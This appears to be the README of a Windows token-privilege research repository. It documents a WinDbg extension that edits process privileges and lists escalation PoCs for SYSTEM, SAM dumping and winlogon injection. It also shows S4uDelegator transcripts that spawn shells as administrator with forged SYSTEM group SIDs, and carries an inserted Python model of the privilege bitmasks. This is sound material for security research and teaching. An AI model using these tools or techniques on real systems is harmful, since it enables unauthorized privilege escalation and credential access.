PrivFu

Kernel mode WinDbg extension and PoCs for testing how token privileges work.

There are notable repositories and articles about token privilege abuse, such as Grzegorz Tworek's Priv2Admin. The code in this repository is intended to help investigate how token privileges work.

ArtsOfGetSystem

This project covers how to get SYSTEM privileges from a high integrity level shell. See its README.md for details.

KernelWritePoCs

The purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerabilities. All PoCs are written for HackSys Extreme Vulnerable Driver. Most of these PoCs obtain SYSTEM integrity level by abusing an arbitrary kernel write vulnerability together with token privileges. Tested on Windows 10 version 1809/1903, but they should theoretically work on most Windows 10 builds:

| PoC Name | Description |
| --- | --- |
| CreateAssignTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege. |
| CreateImpersonateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. |
| CreateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege. |
| DebugInjectionVariant | This PoC performs EoP with SeDebugPrivilege. Uses code injection into winlogon.exe at the final stage. |
| DebugUpdateProcVariant | This PoC performs EoP with SeDebugPrivilege. Creates a SYSTEM process from winlogon.exe with the UpdateProcThreadAttribute API at the final stage. |
| RestoreServiceModificationVariant | This PoC performs EoP with SeRestorePrivilege. Use HijackShellLib with this PoC. |
| SecondaryLogonVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. Uses the secondary logon service at the final stage. |
| TakeOwnershipServiceModificationVariant | This PoC performs EoP with SeTakeOwnershipPrivilege. Use HijackShellLib with this PoC. |
| TcbS4uAssignTokenVariant | This PoC performs EoP with SeTcbPrivilege. Gets a System mandatory level shell from medium mandatory level. |
| TcbS4uImpersonationVariant | This PoC performs EoP with SeTcbPrivilege. Performs thread impersonation with S4U logon. Does not get a high or system integrity level. |

PrivEditor

Warning

In some environments, the Debug build does not work; the Release build is preferred.

PrivEditor is a kernel mode WinDbg extension that manipulates the token privileges of a specific process. This extension makes it easy to configure the token privileges you want to investigate:

0: kd> .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

PrivEditor - Kernel Mode WinDbg extension for token privilege edit.

Commands :
    + !getps       : List processes in target system.
    + !getpriv     : List privileges of a process.
    + !addpriv     : Add privilege(s) to a process.
    + !rmpriv      : Remove privilege(s) from a process.
    + !enablepriv  : Enable privilege(s) of a process.
    + !disablepriv : Disable privilege(s) of a process.
    + !enableall   : Enable all privileges available to a process.
    + !disableall  : Disable all privileges available to a process.

[*] To see command help, execute "!<Command> help" or "!<Command> /?".

getps Command

This command lists the processes in your target system:

0: kd> !getps /?

!getps - List processes in target system.

Usage : !getps [Process Name]

    Process Name : (OPTIONAL) Specifies filter string for process name.

If you execute this command without any arguments, it lists all processes in your target system as follows:

0: kd> !getps

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
       0 0xfffff805`81233630      0x00000000`00000000 Idle
       4 0xffffd60f`ec068380      0xffffaf00`cec07a40 System
      68 0xffffd60f`f1780480      0xffffaf00`d3b290a0 svchost.exe
      88 0xffffd60f`ec0db080      0xffffaf00`cec0d080 Registry
     324 0xffffd60f`ef342040      0xffffaf00`d0416080 smss.exe
     348 0xffffd60f`f052f100      0xffffaf00`d25d30a0 dwm.exe
     408 0xffffd60f`eca8e140      0xffffaf00`d21bd930 csrss.exe
     480 0xffffd60f`f05a8340      0xffffaf00`d2568670 svchost.exe
     484 0xffffd60f`efcd60c0      0xffffaf00`d06430e0 wininit.exe
     500 0xffffd60f`efd130c0      0xffffaf00`d23100a0 csrss.exe
     580 0xffffd60f`efdc0080      0xffffaf00`d2266630 winlogon.exe

--snip--

If you want to see specific processes, set a string filter as follows. The filter is a case-insensitive prefix (forward) match on the process name:

0: kd> !getps micro

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
    4568 0xffffd60f`f14ed080      0xffffaf00`d3db60a0 MicrosoftEdge.exe
    4884 0xffffd60f`f1647080      0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
    4892 0xffffd60f`f1685080      0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe

getpriv Command

This command lists the token privileges of a specific process:

0: kd> !getpriv /?

!getpriv - List privileges of a process.

Usage : !getpriv <PID>

    PID : Specifies target process ID.

To use this command, you need to set a target process ID in decimal format as follows:

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

addpriv Command

This command adds token privilege(s) to a specific process:

0: kd> !addpriv /?

!addpriv - Add privilege(s) to a process.

Usage : !addpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.
        + IncreaseQuota                  : SeIncreaseQuotaPrivilege.
        + MachineAccount                 : SeMachineAccountPrivilege.
        + Tcb                            : SeTcbPrivilege.
        + Security                       : SeSecurityPrivilege.
        + TakeOwnership                  : SeTakeOwnershipPrivilege.
        + LoadDriver                     : SeLoadDriverPrivilege.
        + SystemProfile                  : SeSystemProfilePrivilege.
        + Systemtime                     : SeSystemtimePrivilege.
        + ProfileSingleProcess           : SeProfileSingleProcessPrivilege.
        + IncreaseBasePriority           : SeIncreaseBasePriorityPrivilege.
        + CreatePagefile                 : SeCreatePagefilePrivilege.
        + CreatePermanent                : SeCreatePermanentPrivilege.
        + Backup                         : SeBackupPrivilege.
        + Restore                        : SeRestorePrivilege.
        + Shutdown                       : SeShutdownPrivilege.
        + Debug                          : SeDebugPrivilege.
        + Audit                          : SeAuditPrivilege.
        + SystemEnvironment              : SeSystemEnvironmentPrivilege.
        + ChangeNotify                   : SeChangeNotifyPrivilege.
        + RemoteShutdown                 : SeRemoteShutdownPrivilege.
        + Undock                         : SeUndockPrivilege.
        + SyncAgent                      : SeSyncAgentPrivilege.
        + EnableDelegation               : SeEnableDelegationPrivilege.
        + ManageVolume                   : SeManageVolumePrivilege.
        + Impersonate                    : SeImpersonatePrivilege.
        + CreateGlobal                   : SeCreateGlobalPrivilege.
        + TrustedCredManAccess           : SeTrustedCredManAccessPrivilege.
        + Relabel                        : SeRelabelPrivilege.
        + IncreaseWorkingSet             : SeIncreaseWorkingSetPrivilege.
        + TimeZone                       : SeTimeZonePrivilege.
        + CreateSymbolicLink             : SeCreateSymbolicLinkPrivilege.
        + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
        + All                            : All privileges.

For example, if you want to add SeDebugPrivilege to a specific process, pass the target process ID as the first argument and the shortened privilege name debug, as listed in the help message, as the second argument:

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

0: kd> !addpriv 5704 debug

[>] Trying to add SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

The privilege name argument is case insensitive.

If you want to add all token privileges at a time, set all as the privilege name argument:

0: kd> !addpriv 5704 all

[>] Trying to add all privileges.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeCreateTokenPrivilege                     Disabled
SeAssignPrimaryTokenPrivilege              Disabled
SeLockMemoryPrivilege                      Disabled
SeIncreaseQuotaPrivilege                   Disabled
SeMachineAccountPrivilege                  Disabled
SeTcbPrivilege                             Disabled
SeSecurityPrivilege                        Disabled

--snip--

rmpriv Command

This command removes token privilege(s) from a specific process:

0: kd> !rmpriv /?

!rmpriv - Remove privilege(s) from a process.

Usage : !rmpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

If you want to remove SeChangeNotifyPrivilege, execute this command as follows:

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

0: kd> !rmpriv 352 changenotify

[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

As with the !addpriv command, you can remove all token privileges at once by setting all as the privilege name argument:

0: kd> !rmpriv 352 all

[>] Trying to remove all privileges.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

enablepriv Command

This command enables token privilege(s) of a specific process:

0: kd> !enablepriv /?

!enablepriv - Enable privilege(s) of a process.

Usage : !enablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

The first argument is for process ID, and the second is for token privilege name:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 timezone

[>] Trying to enable SeTimeZonePrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

If you try to enable a privilege that is not yet present in the token, this command adds it automatically before enabling it:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 debug

[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

disablepriv Command

This command disables token privilege(s) of a specific process:

0: kd> !disablepriv /?

!disablepriv - Disable privilege(s) of a process.

Usage : !disablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

To use this command, set a target process ID for the first argument and token privilege name for the second argument:

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !disablepriv 1932 debug

[>] Trying to disable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

enableall Command

This command enables all token privileges present in a specific process's token:

0: kd> !enableall /?

!enableall - Enable all privileges available to a process.

Usage : !enableall <PID>

    PID       : Specifies target process ID.

It works as follows:

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !enableall 3792

[>] Trying to enable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

disableall Command

This command disables all token privileges of a specific process:

0: kd> !disableall /?

!disableall - Disable all privileges available to a process.

Usage : !disableall <PID>

    PID : Specifies target process ID.

This command is equivalent to !disablepriv <PID> all. Works as follows:

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !disableall 3792

[>] Trying to disable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
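
All of the commands above edit the same kernel structure: on x64, nt!_SEP_TOKEN_PRIVILEGES (the address that !getps and !getpriv print) is three 64-bit bitmasks, Present, Enabled and EnabledByDefault, and bit N of each mask belongs to the privilege whose LUID is N. The following Python model is an added example and not PrivEditor's own code. It reproduces what each command does to those masks (!addpriv sets Present only, which is why a freshly added privilege lists as Disabled; !enablepriv sets Present and Enabled, matching the auto-add behaviour shown above; !rmpriv clears all three), renders the listing in the ascending-LUID order that !getpriv uses, and also shows the user-mode rendering of the same state ("EnabledByDefault, Enabled") that GetTokenInformation-based tools print. The privilege LUIDs 2..36 and the structure layout are Windows' documented values; the sample token is constructed to match the medium-integrity cmd.exe in the transcripts, and the exact way PrivEditor treats EnabledByDefault is an assumption, not something the page states.

```python
"""Model of nt!_SEP_TOKEN_PRIVILEGES and the PrivEditor operations on it (added example)."""
import struct

# Well-known privilege LUIDs: SE_MIN_WELL_KNOWN_PRIVILEGE = 2 .. SE_MAX_WELL_KNOWN_PRIVILEGE = 36,
# listed in LUID order (the same order PrivEditor's help and !getpriv output use).
_NAMES = (
    "CreateToken AssignPrimaryToken LockMemory IncreaseQuota MachineAccount Tcb Security "
    "TakeOwnership LoadDriver SystemProfile Systemtime ProfileSingleProcess IncreaseBasePriority "
    "CreatePagefile CreatePermanent Backup Restore Shutdown Debug Audit SystemEnvironment "
    "ChangeNotify RemoteShutdown Undock SyncAgent EnableDelegation ManageVolume Impersonate "
    "CreateGlobal TrustedCredManAccess Relabel IncreaseWorkingSet TimeZone CreateSymbolicLink "
    "DelegateSessionUserImpersonate"
).split()
PRIVILEGE_LUIDS = {f"Se{n}Privilege": luid for luid, n in enumerate(_NAMES, start=2)}
# Short, case-insensitive names as accepted by !addpriv and friends: "debug" -> SeDebugPrivilege
SHORT_NAMES = {n.lower(): f"Se{n}Privilege" for n in _NAMES}
ALL_MASK = sum(1 << luid for luid in PRIVILEGE_LUIDS.values())


class SepTokenPrivileges:
    """The three ULONGLONG masks, in the order they sit in memory on x64 (dq <addr> L3)."""
    LAYOUT = "<QQQ"  # Present, Enabled, EnabledByDefault

    def __init__(self, present=0, enabled=0, enabled_by_default=0):
        self.present, self.enabled, self.enabled_by_default = present, enabled, enabled_by_default

    @classmethod
    def from_bytes(cls, raw):
        """Decode the 24 raw bytes of the structure as read from the debuggee."""
        return cls(*struct.unpack(cls.LAYOUT, raw[:24]))

    def to_bytes(self):
        return struct.pack(self.LAYOUT, self.present, self.enabled, self.enabled_by_default)

    @staticmethod
    def mask(name):
        """Bitmask for a short name ("debug"), a full name, or "all"; ValueError if unknown."""
        key = name.lower()
        if key == "all":
            return ALL_MASK
        full = SHORT_NAMES.get(key) or next((n for n in PRIVILEGE_LUIDS if n.lower() == key), None)
        if full is None:
            raise ValueError(f"unknown privilege: {name}")
        return 1 << PRIVILEGE_LUIDS[full]

    def add(self, name):          # !addpriv: Present only, so the privilege lists as "Disabled"
        self.present |= self.mask(name)

    def remove(self, name):       # !rmpriv: drop the privilege from every mask
        keep = ~self.mask(name)
        self.present &= keep
        self.enabled &= keep
        self.enabled_by_default &= keep

    def enable(self, name):       # !enablepriv: add first if absent, then set Enabled
        bits = self.mask(name)
        self.present |= bits
        self.enabled |= bits

    def disable(self, name):      # !disablepriv: clear Enabled, keep Present
        self.enabled &= ~self.mask(name)

    def enable_all(self):         # !enableall: only privileges already present
        self.enabled = self.present

    def disable_all(self):        # !disableall, same as !disablepriv <PID> all
        self.enabled = 0

    def listing(self):
        """Rows as !getpriv prints them: (name, "Enabled"/"Disabled") in ascending LUID order."""
        return [(full, "Enabled" if self.enabled & (1 << luid) else "Disabled")
                for full, luid in PRIVILEGE_LUIDS.items() if self.present & (1 << luid)]

    def user_mode_attributes(self):
        """The same state expressed as LUID_AND_ATTRIBUTES flags (SE_PRIVILEGE_ENABLED_BY_DEFAULT,
        SE_PRIVILEGE_ENABLED), the format user-mode token viewers print."""
        rows = []
        for full, luid in PRIVILEGE_LUIDS.items():
            bit = 1 << luid
            if not self.present & bit:
                continue
            flags = [f for f, m in (("EnabledByDefault", self.enabled_by_default),
                                    ("Enabled", self.enabled)) if m & bit]
            rows.append((full, ", ".join(flags) or "Disabled"))
        return rows


def medium_cmd_token():
    """Constructed sample: the default medium-integrity cmd.exe token seen in the transcripts."""
    tok = SepTokenPrivileges()
    for name in ("shutdown", "changenotify", "undock", "increaseworkingset", "timezone"):
        tok.add(name)
    tok.enable("changenotify")
    tok.enabled_by_default = tok.enabled   # SeChangeNotifyPrivilege is enabled by default
    return tok


def replay_debug_sequence():
    """Replay the !addpriv <PID> debug and then !enablepriv <PID> debug transcripts."""
    tok = medium_cmd_token()
    tok.add("debug")
    after_add = tok.listing()
    tok.enable("Debug")
    return after_add, tok.listing()


if __name__ == "__main__":
    tok = medium_cmd_token()
    print(f"Present=0x{tok.present:016x} Enabled=0x{tok.enabled:016x}")
    for name, state in replay_debug_sequence()[1]:
        print(f"{name:<42} {state}")
```

Because Present decides what !getpriv shows at all and Enabled only decides the column, the order of operations matters when reading raw memory: a privilege whose Enabled bit is set but whose Present bit is clear does not exist from the kernel's point of view, which is why !rmpriv clears every mask rather than just Present.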

PrivilegedOperations

This project contains PoCs for sensitive token privileges such as SeDebugPrivilege. Currently, PoCs are released for only some of them.

| Program Name | Description |
| --- | --- |
| SeAuditPrivilegePoC | This PoC tries to create new security event(s) with SeAuditPrivilege. SeAuditPrivilege does not require high integrity level, but this PoC requires administrative privileges on its first execution to install a new event source. Additionally, to confirm the result, this PoC may require a change to the local security policy settings. |
| SeBackupPrivilegePoC | This PoC tries to dump HKLM\SAM with SeBackupPrivilege. |
| SeCreatePagefilePrivilegePoC | This PoC tries to set the pagefile option to specific values with SeCreatePagefilePrivilege. |
| SeCreateTokenPrivilegePoC | This PoC tries to create an elevated token with SeCreateTokenPrivilege. |
| SeDebugPrivilegePoC | This PoC tries to open a handle to winlogon.exe with SeDebugPrivilege. |
| SeRestorePrivilegePoC | This PoC tries to write a test file in C:\Windows\System32\ with SeRestorePrivilege. |
| SeSecurityPrivilegePoC | This PoC tries to read the latest security event with SeSecurityPrivilege. |
| SeShutdownPrivilegePoC | This PoC tries to cause a BSOD with SeShutdownPrivilege. |
| SeSystemEnvironmentPrivilegePoC | This PoC tries to enumerate system environment variables with SeSystemEnvironmentPrivilege. Works on UEFI-based systems only. Due to OS functionality, this PoC does not work on OSes earlier than Windows 10 Build 1809. |
| SeTakeOwnershipPrivilegePoC | This PoC tries to change the owner of HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice to the caller's user account with SeTakeOwnershipPrivilege. |
| SeTcbPrivilegePoC | This PoC tries to perform S4U logon as Builtin\Backup Operators with SeTcbPrivilege. |
| SeTrustedCredManAccessPrivilegePoC | This PoC tries to access a DPAPI blob with SeTrustedCredManAccessPrivilege. |

S4uDelegator

This tool performs S4U logon with SeTcbPrivilege. Administrative privileges are required to perform S4U logon with this tool. Currently, only a few operations are implemented (more will be implemented in the future):

C:\dev>S4uDelegator.exe -h

S4uDelegator - Tool for S4U Logon.

Usage: S4uDelegator.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

        + lookup - Lookup account's SID.
        + shell  - Perform S4U logon and get shell.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

[!] -m option is required.

lookup Module

This module looks up an account's SID as follows:

C:\dev>S4uDelegator.exe -m lookup -d contoso -u david

[*] Result:
    |-> Account Name : CONTOSO\david
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-1104
    |-> Account Type : SidTypeUser


C:\dev>S4uDelegator.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500

[*] Result:
    |-> Account Name : CONTOSO\Administrator
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type : SidTypeUser


C:\dev>S4uDelegator.exe -m lookup -d contoso -u "domain admins"

[*] Result:
    |-> Account Name : CONTOSO\Domain Admins
    |-> SID          : S-1-5-21-3654360273-254804765-2004310818-512
    |-> Account Type : SidTypeGroup

If you don't specify a domain name with the -d option, the local computer name is used as the domain name:

C:\dev>hostname
CL01

C:\dev>S4uDelegator.exe -m lookup -u admin

[*] Result:
    |-> Account Name : CL01\admin
    |-> SID          : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type : SidTypeUser

shell Module

This module gets an interactive shell via S4U logon:

C:\dev>whoami /user

USER INFORMATION
----------------

User Name     SID
============= =============================================
contoso\david S-1-5-21-3654360273-254804765-2004310818-1104

C:\dev>S4uDelegator.exe -m shell -u admin

[>] Target account to S4U:
    |-> Account Name        : CL01\admin
    |-> Account Sid         : S-1-5-21-2659926013-4203293582-4033841475-500
    |-> Account Type        : SidTypeUser
    |-> User Principal Name : (NULL)
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 7140
[+] Impersonation is successful.
[>] Trying to MSV S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name  SID
========== =============================================
cl01\admin S-1-5-21-2659926013-4203293582-4033841475-500

If you want to add token groups, you can pass them as comma-separated SID values with the -e option as follows:

C:\Tools>whoami
contoso\david

C:\Tools>S4uDelegator.exe -m shell -d contoso -u administrator -e s-1-5-18,S-1-5-19

[>] Target account to S4U:
    |-> Account Name        : CONTOSO\administrator
    |-> Account Sid         : S-1-5-21-3654360273-254804765-2004310818-500
    |-> Account Type        : SidTypeUser
    |-> User Principal Name : [email protected]
[>] Group SID to add:
    |-> [VALID] NT AUTHORITY\SYSTEM (SID : S-1-5-18) will be added.
    |-> [VALID] NT AUTHORITY\LOCAL SERVICE (SID : S-1-5-19) will be added.
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2660
[+] Impersonation is successful.
[>] Trying to Kerberos S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Tools>whoami
contoso\administrator

C:\Tools>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                     Type             SID                                          Attributes
============================================== ================ ============================================ ===============================================================
Everyone                                       Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                  Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                         Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                           Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users               Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                 Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SYSTEM                            Well-known group S-1-5-18                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\LOCAL SERVICE                     Well-known group S-1-5-19                                     Mandatory group, Enabled by default, Enabled group
CONTOSO\Group Policy Creator Owners            Group            S-1-5-21-3654360273-254804765-2004310818-520 Mandatory group, Enabled by default, Enabled group
CONTOSO\Domain Admins                          Group            S-1-5-21-3654360273-254804765-2004310818-512 Mandatory group, Enabled by default, Enabled group
CONTOSO\Schema Admins                          Group            S-1-5-21-3654360273-254804765-2004310818-518 Mandatory group, Enabled by default, Enabled group
CONTOSO\Enterprise Admins                      Group            S-1-5-21-3654360273-254804765-2004310818-519 Mandatory group, Enabled by default, Enabled group
Service asserted identity                      Well-known group S-1-18-2                                     Mandatory group, Enabled by default, Enabled group
CONTOSO\Denied RODC Password Replication Group Alias            S-1-5-21-3654360273-254804765-2004310818-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level         Label            S-1-16-16384
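
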